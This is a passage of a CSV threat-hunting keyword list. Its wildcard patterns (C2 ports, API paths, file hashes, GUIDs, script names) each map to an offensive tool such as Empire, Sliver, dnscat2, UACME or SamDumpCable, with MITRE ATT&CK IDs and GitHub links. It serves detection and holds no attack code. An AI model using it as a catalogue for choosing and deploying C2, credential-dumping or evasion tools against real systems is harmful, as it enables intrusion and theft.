+"*127.0.0.1:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*127.0.0.1:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z"
+"*127.0.0.1:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
+"*127.0.0.1:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*127.0.0.1:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z"
+"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z"
+"*1337*/api/agents/*/results?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*1337*/api/creds?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*1337*/api/listeners?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*1337*infernal-twin*","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1193","273","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z"
+"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*192.168.0.110:1234*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*192.168.1.229 Passw0rd!*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1a279f5df4103743b823ec2a6a08436fdf63fe30*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - 
T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*1c50adeb-53ac-41b9-9c34-7045cffbae45*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*1C5EDA8C-D27F-44A4-A156-6F863477194D*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*1E70D62D-CC36-480F-82BB-E9593A759AF9*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*1mil-AD-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information 
Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6905","1738","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" +"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2_lyncbrute.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*22A156EA-2623-45C7-8E50-E864D9FC44D3*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*23975ac9-f51c-443a-8318-db006fd83100*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User 
Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*261f880e-4bee-428d-9f64-c29292002c19*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - 
T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*29446C11-A1A5-47F6-B418-0D699C6C3339*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*2944dbfc-8a1e-4759-a8a2-e4568950601d*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*2D863D7A-A369-419C-B4B3-54BDB88B5816*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" +"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account 